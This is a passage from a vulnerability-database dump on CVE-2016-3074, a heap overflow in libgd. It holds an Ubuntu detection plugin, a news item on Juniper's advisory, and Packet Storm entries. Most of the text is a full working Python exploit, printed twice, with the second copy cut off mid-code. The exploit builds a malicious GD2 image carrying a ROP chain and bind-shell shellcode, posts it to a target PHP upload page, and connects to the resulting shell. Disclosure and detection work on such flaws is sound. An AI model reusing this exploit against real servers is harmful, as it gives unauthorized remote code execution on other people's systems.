value:\"p-cpe:/a:canonical:ubuntu_linux:libgd3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.10|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.10 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libgd2-noxpm\", pkgver:\"2.0.36~rc1~dfsg-6ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libgd2-xpm\", pkgver:\"2.0.36~rc1~dfsg-6ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libgd3\", pkgver:\"2.1.0-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"libgd3\", pkgver:\"2.1.1-4ubuntu0.15.10.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgd3\", pkgver:\"2.1.1-4ubuntu0.16.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgd2-noxpm / libgd2-xpm / libgd3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:17", "bulletinFamily": "info", "cvelist": ["CVE-2016-3074"], "description": "Juniper Networks warned customers Thursday of a high-risk vulnerability in the GD graphics library that could allow a remote attacker to take control of systems running certain versions of the Junos OS.\n\nThe alert was in conjunction with a warning from the U.S. Computer Emergency Readiness Team (US-CERT) that said affected versions of the Junos OS were 12.1X46, 12.3X48, 15.1X49, 14.2, 15.1, 15.1X53, 16.1 and 16.2. Hardware running the software includes router models T Series and MX series along with four Juniper switch products.\n\nThe problem ([CVE-2016-3074](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3074>)) is tied to the use of the open-source image library GD graphics library ([libgd](<https://github.com/libgd/libgd>)) bundled with PHP version 4.3 and above.\n\n\u201cAn integer signedness vulnerability exists in libgd 2.1.1 which may result in a heap overflow when processing compressed gd2 data,\u201d the [Juniper Security Advisory](<https://www.us-cert.gov/ncas/current-activity/2017/08/09/Juniper-Networks-Releases-Junos-OS-Security-Updates>) said. Attackers can exploit this issue to execute arbitrary commands or cause a denial-of-service condition.\n\nUse of the flawed libgd library has stung a wide range of firms over the past year, including [HP Enterprise](<https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05240731>), [Red Hat](<https://access.redhat.com/security/cve/cve-2016-3074>), [Fedora](<https://lists.fedoraproject.org/pipermail/package-announce/2016-May/183724.html>) and [Debian](<http://www.debian.org/security/2016/dsa-3556>), each of which have issued separate security bulletins on the library.\n\nCustomers are encouraged up to update their software to the latest version. A workaround also exists and includes disabling services that can utilize on-board PHP scripting like J-Web and XNM-SSL according to Juniper. Affected users can also choose to discontinue the use of Netconf and PyEZ with PHP.\n\n\u201cIn addition to the recommendations listed above, it is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. Use access lists or firewall filters to limit access to the device from trusted, administrative networks or hosts,\u201d Juniper advises.\n\nThe libgd vulnerability, as used by Juniper in its switches and routers, has a CVSS score of 8.1, making this is a high-risk vulnerability.\n", "modified": "2017-08-10T17:56:38", "published": "2017-08-10T13:56:38", "id": "THREATPOST:2EDAD602D032B0A6F91130A32BBBBE6C", "href": "https://threatpost.com/juniper-issues-security-alert-tied-to-routers-and-switches/127373/", "type": "threatpost", "title": "Juniper Issues Security Alert Tied to Routers and Switches", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-01-17T03:04:28", "description": "", "published": "2017-01-17T00:00:00", "type": "packetstorm", "title": "PHP LibGD Heap Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2017-01-17T00:00:00", "id": "PACKETSTORM:140537", "href": "https://packetstormsecurity.com/files/140537/PHP-LibGD-Heap-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/env python2 \n# \n# PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and \n# php5-fpm running behind nginx. \n# \n# ,---- \n# | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php \n# | [*] this may take a while \n# | [*] offset 912 of 10000... \n# | [+] connected to 1.2.3.4:5555 \n# | id \n# | uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# | \n# | uname -a \n# | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC \n# | 2016 x86_64 x86_64 x86_64 GNU/Linux \n# | \n# | dpkg -l|grep -E \"php5-(fpm|gd)\" \n# | ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ... \n# | ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ... \n# | \n# | cat upload.php \n# | <?php \n# | imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]); \n# | ?> \n# `---- \n# \n# - Hans Jerry Illikainen \n# \nimport sys \nimport os \nimport zlib \nimport socket \nimport threading \nimport argparse \nimport urlparse \nfrom struct import pack \n \nimport requests \n \n# non-optimized bindshell from binjitsu \n# \n# context(arch=\"amd64\", os=\"linux\") \n# asm(shellcraft.bindsh(port, \"ipv4\")) \nshellcode = [ \n\"\\x6a\\x29\\x58\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x99\\x0f\\x05\\x52\\xba\", \n\"%(fam-and-port)s\\x52\\x6a\\x10\\x5a\\x48\\x89\\xc5\\x48\\x89\\xc7\", \n\"\\x6a\\x31\\x58\\x48\\x89\\xe6\\x0f\\x05\\x6a\\x32\\x58\\x48\\x89\\xef\", \n\"\\x6a\\x01\\x5e\\x0f\\x05\\x6a\\x2b\\x58\\x48\\x89\\xef\\x31\\xf6\\x99\", \n\"\\x0f\\x05\\x48\\x89\\xc5\\x6a\\x03\\x5e\\x48\\xff\\xce\\x78\\x0b\\x56\", \n\"\\x6a\\x21\\x58\\x48\\x89\\xef\\x0f\\x05\\xeb\\xef\\x6a\\x68\\x48\\xb8\", \n\"\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x2f\\x73\\x50\\x6a\\x3b\\x58\\x48\\x89\", \n\"\\xe7\\x31\\xf6\\x99\\x0f\\x05\" \n] \n \ngadgets = [ \n\"\\x90\" * 40, \n \n# [16] \n# \n# 0xb6eca2: popfq \n# 0xb6eca3: callq *%rsp \npack(\"<Q\", 0xb6eca2), \n \n\"%(pad)s\", \n \n# [2] \n# \n# 0x4dbe8c: add $0xd8,%rsp \n# 0x4dbe93: retq \npack(\"<Q\", 0x4dbe8c), \n \n\"\\x90\" * 48, \n \n# [1] \n# \n# (gdb) x/x {void *}($rsp + 8) \n# 0x12d7d60: 0x9090909090909090 \n# \n# 0xa91f35: rex.WXB pop %r14 \n# 0xa91f37: mov $0x3,%bh \n# 0xa91f39: pop %rsp \n# 0xa91f3a: retq \npack(\"<Q\", 0xa91f35), \n \n\"\\x90\" * 152, \n \n# [0] \n# \n# (gdb) x/i $rip \n# => 0x7f91acf61f46: callq *0x70(%rax) \n# \n# (gdb) x/gx 0x432b80 \n# 0x432b80: 0x0000000000547880 \n# \n# (gdb) x/3i 0x0000000000547880 \n# 0x547880: push %rbx \n# 0x547881: mov %rdi,%rbx \n# 0x547884: callq *0x20(%rdi) \npack(\"<Q\", 0x432b80 - 0x70), \n \n# [3] \n# \n# 0x463e2c: pop %rbx \n# 0x463e2d: retq \npack(\"<Q\", 0x463e2c), \n \n# [7] \n# \n# 0x463b1d: pop %r12 \n# 0x463b1f: retq \npack(\"<Q\", 0x463b1d), \n \n# [4] \n# \n# 0x473053: pop %rax \n# 0x473054: retq \npack(\"<Q\", 0x473053), \n \n# [6] \n# \n# 0xa8bc37: push %rdx \n# 0xa8bc38: jmpq *%rbx \npack(\"<Q\", 0xa8bc37), \n \n# [5] \n# \n# 0x7b2eaf: mov %r9,%rdx \n# 0x7b2eb2: jmpq *%rax \npack(\"<Q\", 0x7b2eaf), \n \n# [8] \n# \n# 0x552768: mov %rdi,%rax \n# 0x55276b: retq \npack(\"<Q\", 0x552768), \n \n# [9] \n# \n# 0x463e2c: pop %rbx \n# 0x463e2d: retq \npack(\"<Q\", 0x463e2c), \npack(\"<Q\", 0xfffff000), \n \n# [10] \n# \n# 0xb6c734: and %ebx,%eax \n# 0xb6c736: es retq \npack(\"<Q\", 0xb6c734), \n \n# [11] \n# \n# 0x4c93e9: xchg %eax,%ebx \n# 0x4c93ea: retq \npack(\"<Q\", 0x4c93e9), \n \n# [12] \n# \n# 0x406a08: pop %rcx (len, 0x5555) \n# 0x406a09: retq \npack(\"<Q\", 0x406a08), \npack(\"<Q\", 0x5555), \n \n# [13] \n# \n# 0xaf58fd: pop %rdx (PROT_READ|PROT_WRITE|PROT_EXEC) \n# 0xaf58fe: retq \npack(\"<Q\", 0xaf58fd), \npack(\"<Q\", 7), \n \n# [14] \n# \n# 0x473053: pop %rax (mprotect) \n# 0x473054: retq \npack(\"<Q\", 0x473053), \npack(\"<Q\", 125), \n \n# [15] \n# \n# 0x53f9f8: int $0x80 \n# 0x53f9fa: mov 0x38(%r12),%rsi \n# 0x53f9ff: mov $0x8f,%edi \n# 0x53fa04: callq *0x28(%r12) \npack(\"<Q\", 0x53f9f8), \n \n\"\\x90\" * 100, \n] \n \n# gd.h: #define gdMaxColors 256 \ngd_max_colors = 256 \n \n \ndef make_gd2(chunks): \ngd2 = [ \n\"gd2\\x00\", # signature \npack(\">H\", 2), # version \npack(\">H\", 1), # image size (x) \npack(\">H\", 1), # image size (y) \npack(\">H\", 0x40), # chunk size (0x40 <= cs <= 0x80) \npack(\">H\", 2), # format (GD2_FMT_COMPRESSED) \npack(\">H\", 1), # num of chunks wide \npack(\">H\", len(chunks)) # num of chunks high \n] \ncolors = [ \npack(\">B\", 0), # trueColorFlag \npack(\">H\", 0), # im->colorsTotal \npack(\">I\", 0), # im->transparent \npack(\">I\", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i] \n] \n \noffset = len(\"\".join(gd2)) + len(\"\".join(colors)) + len(chunks) * 8 \nfor data, size in chunks: \ngd2.append(pack(\">I\", offset)) # cidx[i].offset \ngd2.append(pack(\">I\", size)) # cidx[i].size \noffset += size \n \nreturn \"\".join(gd2 + colors + [data for data, size in chunks]) \n \n \ndef connect(host, port): \naddr = socket.gethostbyname(host) \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect((addr, port)) \nexcept socket.error: \nreturn \n \nprint(\"\\n[+] connected to %s:%d\" % (host, port)) \nif os.fork() == 0: \nwhile True: \ntry: \ndata = sock.recv(8192) \nexcept KeyboardInterrupt: \nsys.exit(\"\\n[!] receiver aborting\") \nif data == \"\": \nsys.exit(\"[!] receiver aborting\") \nsys.stdout.write(data) \nelse: \nwhile True: \ntry: \ncmd = sys.stdin.readline() \nexcept KeyboardInterrupt: \nsock.close() \nsys.exit(\"[!] sender aborting\") \nsock.send(cmd) \n \n \ndef send_gd2(url, gd2, code): \nfiles = {\"file\": gd2} \ntry: \nreq = requests.post(url, files=files, timeout=5) \ncode.append(req.status_code) \nexcept requests.exceptions.ReadTimeout: \npass \n \n \ndef get_payload(offset, port): \nrop = \"\".join(gadgets) % {\"pad\": \"\\x90\" * offset} \n \nfam_and_port = pack(\"<I\", (socket.AF_INET | (socket.htons(port) << 16))) \nsc = \"\".join(shellcode) % {\"fam-and-port\": fam_and_port} \n \nreturn rop + sc \n \n \ndef get_args(): \np = argparse.ArgumentParser() \np.add_argument(\"--threads\", type=int, default=20) \np.add_argument(\"--bind-port\", type=int, default=8000) \np.add_argument(\"--offsets\", type=int, default=[0, 10000], nargs=2) \np.add_argument(\"url\") \nreturn p.parse_args() \n \n \ndef main(): \nargs = get_args() \nhost = urlparse.urlparse(args.url).netloc.split(\":\")[0] \n \nprint(\"[*] this may take a while\") \nfor i in range(args.offsets[0], args.offsets[1]): \nsys.stdout.write(\"\\r[*] offset %d of %d...\" % (i, args.offsets[1])) \nsys.stdout.flush() \n \nvalid = zlib.compress(\"A\" * 100, 0) \npayload = get_payload(i, args.bind_port) \ngd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)]) \n \nthreads = [] \ncode = [] \nfor _ in range(args.threads): \nt = threading.Thread(target=send_gd2, args=(args.url, gd2, code)) \nt.start() \nthreads.append(t) \n \nfor t in threads: \nt.join() \n \nif 404 in code: \nsys.exit(\"\\n[-] 404: %s\" % args.url) \nconnect(host, args.bind_port) \n \nprint(\"\\n[-] nope...\") \n \nif __name__ == \"__main__\": \nmain() \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140537/phplibgd-overflow.txt"}, {"lastseen": "2016-12-05T22:19:10", "description": "", "published": "2016-04-21T00:00:00", "type": "packetstorm", "title": "libgd 2.1.1 Signedness", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-21T00:00:00", "id": "PACKETSTORM:136757", "href": "https://packetstormsecurity.com/files/136757/libgd-2.1.1-Signedness.html", "sourceData": "`Overview \n======== \n \nlibgd [1] is an open-source image library. It is perhaps primarily used \nby the PHP project. It has been bundled with the default installation \nof PHP since version 4.3 [2]. \n \nA signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which \nmay result in a heap overflow when processing compressed gd2 data. \n \n \nDetails \n======= \n \n4 bytes representing the chunk index size is stored in a signed integer, \nchunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers: \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 53 typedef struct { \n| 54 int offset; \n| 55 int size; \n| 56 } \n| 57 t_chunk_info; \n`---- \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 65 static int \n| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy, \n| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy, \n| 68 t_chunk_info ** chunkIdx) \n| 69 { \n| ... \n| 73 t_chunk_info *cidx; \n| ... \n| 155 if (gd2_compressed (*fmt)) { \n| ... \n| 163 for (i = 0; i < nc; i++) { \n| ... \n| 167 if (gdGetInt (&cidx[i].size, in) != 1) { \n| 168 goto fail2; \n| 169 }; \n| 170 }; \n| 171 *chunkIdx = cidx; \n| 172 }; \n| ... \n| 181 } \n`---- \n \n`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then \nallocates memory for the compressed data based on the value of the \nlargest chunk size: \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 371|637 if (gd2_compressed (fmt)) { \n| 372|638 /* Find the maximum compressed chunk size. */ \n| 373|639 compMax = 0; \n| 374|640 for (i = 0; (i < nc); i++) { \n| 375|641 if (chunkIdx[i].size > compMax) { \n| 376|642 compMax = chunkIdx[i].size; \n| 377|643 }; \n| 378|644 }; \n| 379|645 compMax++; \n| ...|... \n| 387|656 compBuf = gdCalloc (compMax, 1); \n| ...|... \n| 393|661 }; \n`---- \n \nA size of <= 0 results in `compMax' retaining its initial value during \nthe loop, followed by it being incremented to 1. Since `compMax' is \nused as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation \nfor `compBuf'. \n \nThis is followed by compressed data being read to `compBuf' based on the \ncurrent (potentially negative) chunk size: \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in) \n| 340 { \n| ... \n| 413 if (gd2_compressed (fmt)) { \n| 414 \n| 415 chunkLen = chunkMax; \n| 416 \n| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, \n| 418 compBuf, \n| 419 chunkIdx[chunkNum].size, \n| 420 (char *) chunkBuf, &chunkLen, in)) { \n| 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\")); \n| 422 goto fail; \n| 423 }; \n| 424 \n| 425 chunkPos = 0; \n| 426 }; \n| ... \n| 501 } \n`---- \n \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h) \n| 586 { \n| ... \n| 713 if (!gd2_compressed (fmt)) { \n| ... \n| 731 } else { \n| 732 chunkNum = cx + cy * ncx; \n| 733 \n| 734 chunkLen = chunkMax; \n| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, \n| 736 compBuf, \n| 737 chunkIdx[chunkNum].size, \n| 738 (char *) chunkBuf, &chunkLen, in)) { \n| 739 printf (\"Error reading comproessed chunk\\n\"); \n| 740 goto fail2; \n| 741 }; \n| ... \n| 746 }; \n| ... \n| 815 } \n`---- \n \nThe size is subsequently interpreted as a size_t by `fread()' or \n`memcpy()', depending on how the image is read: \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 221 static int \n| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf, \n| 223 uLongf * chunkLen, gdIOCtx * in) \n| 224 { \n| ... \n| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) { \n| 237 return FALSE; \n| 238 }; \n| ... \n| 251 } \n`---- \n \nlibgd-2.1.1/src/gd_io.c: \n,---- \n| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx) \n| 212 { \n| 213 return (ctx->getBuf)(ctx, buf, size); \n| 214 } \n`---- \n \n \nFor file contexts: \n \nlibgd-2.1.1/src/gd_io_file.c: \n,---- \n| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f) \n| 53 { \n| ... \n| 67 ctx->ctx.getBuf = fileGetbuf; \n| ... \n| 76 } \n| ... \n| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size) \n| 93 { \n| 94 fileIOCtx *fctx; \n| 95 fctx = (fileIOCtx *)ctx; \n| 96 \n| 97 return (fread(buf, 1, size, fctx->f)); \n| 98 } \n`---- \n \n \nAnd for dynamic contexts: \n \nlibgd-2.1.1/src/gd_io_dp.c: \n,---- \n| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag) \n| 75 { \n| ... \n| 95 ctx->ctx.getBuf = dynamicGetbuf; \n| ... \n| 104 } \n| ... \n| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len) \n| 257 { \n| ... \n| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen); \n| ... \n| 284 } \n`---- \n \n \nPoC \n=== \n \nAgainst Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]: \n \n,---- \n| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php \n| [*] this may take a while \n| [*] offset 912 of 10000... \n| [+] connected to 1.2.3.4:5555 \n| id \n| uid=33(www-data) gid=33(www-data) groups=33(www-data) \n| \n| uname -a \n| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC \n| 2016 x86_64 x86_64 x86_64 GNU/Linux \n| \n| dpkg -l|grep -E \"php5-(fpm|gd)\" \n| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ... \n| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ... \n| \n| cat upload.php \n| <?php \n| imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]); \n| ?> \n`---- \n \n \nSolution \n======== \n \nThis bug has been fixed in git HEAD [4]. \n \n \n \nFootnotes \n_________ \n \n[1] [http://libgd.org/] \n \n[2] [https://en.wikipedia.org/wiki/Libgd] \n \n[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074] \n \n[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19] \n \n \n-- \nHans Jerry Illikainen \n \n \nProof of concept: \n \n#!/usr/bin/env python2 \n# \n# PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and \n# php5-fpm running behind nginx. \n# \n# ,---- \n# | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php \n# | [*] this may take a while \n# | [*] offset 912 of 10000... \n# | [+] connected to 1.2.3.4:5555 \n# | id \n# | uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# | \n# | uname -a \n# | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC \n# | 2016 x86_64 x86_64 x86_64 GNU/Linux \n# | \n# | dpkg -l|grep -E \"php5-(fpm|gd)\" \n# | ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ... \n# | ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ... \n# | \n# | cat upload.php \n# | <?php \n# | imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]); \n# | ?> \n# `---- \n# \n# - Hans Jerry Illikainen \n# \nimport sys \nimport os \nimport zlib \nimport socket \nimport threading \nimport argparse \nimport urlparse \nfrom struct import pack \n \nimport requests \n \n# non-optimized bindshell from binjitsu \n# \n# context(arch=\"amd64\", os=\"linux\") \n# asm(shellcraft.bindsh(port, \"ipv4\")) \nshellcode = [ \n\"\\x6a\\x29\\x58\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x99\\x0f\\x05\\x52\\xba\", \n\"%(fam-and-port)s\\x52\\x6a\\x10\\x5a\\x48\\x89\\xc5\\x48\\x89\\xc7\", \n\"\\x6a\\x31\\x58\\x48\\x89\\xe6\\x0f\\x05\\x6a\\x32\\x58\\x48\\x89\\xef\", \n\"\\x6a\\x01\\x5e\\x0f\\x05\\x6a\\x2b\\x58\\x48\\x89\\xef\\x31\\xf6\\x99\", \n\"\\x0f\\x05\\x48\\x89\\xc5\\x6a\\x03\\x5e\\x48\\xff\\xce\\x78\\x0b\\x56\", \n\"\\x6a\\x21\\x58\\x48\\x89\\xef\\x0f\\x05\\xeb\\xef\\x6a\\x68\\x48\\xb8\", \n\"\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x2f\\x73\\x50\\x6a\\x3b\\x58\\x48\\x89\", \n\"\\xe7\\x31\\xf6\\x99\\x0f\\x05\" \n] \n \ngadgets = [ \n\"\\x90\" * 40, \n \n# [16] \n# \n# 0xb6eca2: popfq \n# 0xb6eca3: callq *%rsp \npack(\"<Q\", 0xb6eca2), \n \n\"%(pad)s\", \n \n# [2] \n# \n# 0x4dbe8c: add $0xd8,%rsp \n# 0x4dbe93: retq \npack(\"<Q\", 0x4dbe8c), \n \n\"\\x90\" * 48, \n \n# [1] \n# \n# (gdb) x/x {void *}($rsp + 8) \n# 0x12d7d60: 0x9090909090909090 \n# \n# 0xa91f35: rex.WXB pop %r14 \n# 0xa91f37: mov $0x3,%bh \n# 0xa91f39: pop %rsp \n# 0xa91f3a: retq \npack(\"<Q\", 0xa91f35), \n \n\"\\x90\" * 152, \n \n# [0] \n# \n# (gdb) x/i $rip \n# => 0x7f91acf61f46: callq *0x70(%rax) \n# \n# (gdb) x/gx 0x432b80 \n# 0x432b80: 0x0000000000547880 \n# \n# (gdb) x/3i 0x0000000000547880 \n# 0x547880: push %rbx \n# 0x547881: mov %rdi,%rbx \n# 0x547884: callq *0x20(%rdi) \npack(\"<Q\", 0x432b80 - 0x70), \n \n# [3] \n# \n# 0x463e2c: pop %rbx \n# 0x463e2d: retq \npack(\"<Q\", 0x463e2c), \n \n# [7] \n# \n# 0x463b1d: pop %r12 \n# 0x463b1f: retq \npack(\"<Q\", 0x463b1d), \n \n# [4] \n# \n# 0x473053: pop %rax \n# 0x473054: retq \npack(\"<Q\", 0x473053), \n \n# [6] \n# \n# 0xa8bc37: push %rdx \n# 0xa8bc38: jmpq *%rbx \npack(\"<Q\", 0xa8bc37), \n \n# [5] \n# \n# 0x7b2eaf: mov %r9,%rdx \n# 0x7b2eb2: jmpq *%rax \npack(\"<Q\", 0x7b2eaf), \n \n# [8] \n# \n# 0x552768: mov %rdi,%rax \n# 0x55276b: retq \npack(\"<Q\", 0x552768), \n \n# [9] \n# \n# 0x463e2c: pop %rbx \n# 0x463e2d: retq \npack(\"<Q\", 0x463e2c), \npack(\"<Q\", 0xfffff000), \n \n# [10] \n# \n# 0xb6c734: and %ebx,%eax \n# 0xb6c736: es retq \npack(\"<Q\", 0xb6c734), \n \n# [11] \n# \n# 0x4c93e9: xchg %eax,%ebx \n# 0x4c93ea: retq \npack(\"<Q\", 0x4c93e9), \n \n# [12] \n# \n# 0x406a08: pop %rcx (len, 0x5555) \n# 0x406a09: retq \npack(\"<Q\", 0x406a08), \npack(\"<Q\", 0x5555), \n \n# [13] \n# \n# 0xaf58fd: pop %rdx (PROT_READ|PROT_WRITE|PROT_EXEC) \n# 0xaf58fe: retq \npack(\"<Q\", 0xaf58fd), \npack(\"<Q\", 7), \n \n# [14] \n# \n# 0x473053: pop %rax (mprotect) \n# 0x473054: retq \npack(\"<Q\", 0x473053), \npack(\"<Q\", 125), \n \n# [15] \n# \n# 0x53f9f8: int $0x80 \n# 0x53f9fa: mov 0x38(%r12),%rsi \n# 0x53f9ff: mov $0x8f,%edi \n# 0x53fa04: callq *0x28(%r12) \npack(\"<Q\", 0x53f9f8), \n \n\"\\x90\" * 100, \n] \n \n# gd.h: #define gdMaxColors 256 \ngd_max_colors = 256 \n \n \ndef make_gd2(chunks): \ngd2 = [ \n\"gd2\\x00\", # signature \npack(\">H\", 2), # version \npack(\">H\", 1), # image size (x) \npack(\">H\", 1), # image size (y) \npack(\">H\", 0x40), # chunk size (0x40 <= cs <= 0x80) \npack(\">H\", 2), # format (GD2_FMT_COMPRESSED) \npack(\">H\", 1), # num of chunks wide \npack(\">H\", len(chunks)) # num of chunks high \n] \ncolors = [ \npack(\">B\", 0), # trueColorFlag \npack(\">H\", 0), # im->colorsTotal \npack(\">I\", 0), # im->transparent \npack(\">I\", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i] \n] \n \noffset = len(\"\".join(gd2)) + len(\"\".join(colors)) + len(chunks) * 8 \nfor data, size in chunks: \ngd2.append(pack(\">I\", offset)) # cidx[i].offset \ngd2.append(pack(\">I\", size)) # cidx[i].size \noffset += size \n \nreturn \"\".join(gd2 + colors + [data for data, size in chunks]) \n \n \ndef connect(host, port): \naddr = socket.gethostbyname(host) \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect((addr, port)) \nexcept socket.error: \nreturn \n \nprint(\"\\n[+] connected to %s:%d\" % (host, port)) \nif os.fork() == 0: \nwhile True: \ntry: \ndata = sock.recv(8192) \nexcept KeyboardInterrupt: \nsys.exit(\"\\n[!] receiver aborting\") \nif data == \"\": \nsys.exit(\"[!] receiver aborting\") \nsys.stdout.write(data) \nelse: \nwhile True: \ntry: \ncmd = sys.stdin.readline() \nexcept KeyboardInterrupt: \nsock.close() \nsys.exit(\"[!] sender aborting\") \nsock.send(cmd) \n \n \ndef send_gd2(url, gd2, code): \nfiles = {\"file\": gd2} \ntry: \nreq = requests.post(url, files=files, timeout=5) \ncode.append(req.status_code) \nexcept requests.exceptions.ReadTimeout: \npass \n \n \ndef get_payload(offset, port): \nrop = \"\".join(gadgets) % {\"pad\": \"\\x90\" * offset} \n \nfam_and_port = pack(\"<I\", (socket.AF_INET | (socket.htons(port) << 16))) \nsc = \"\".join(shellcode) % {\"fam-and-port\": fam_and_port} \n \nreturn rop + sc \n \n 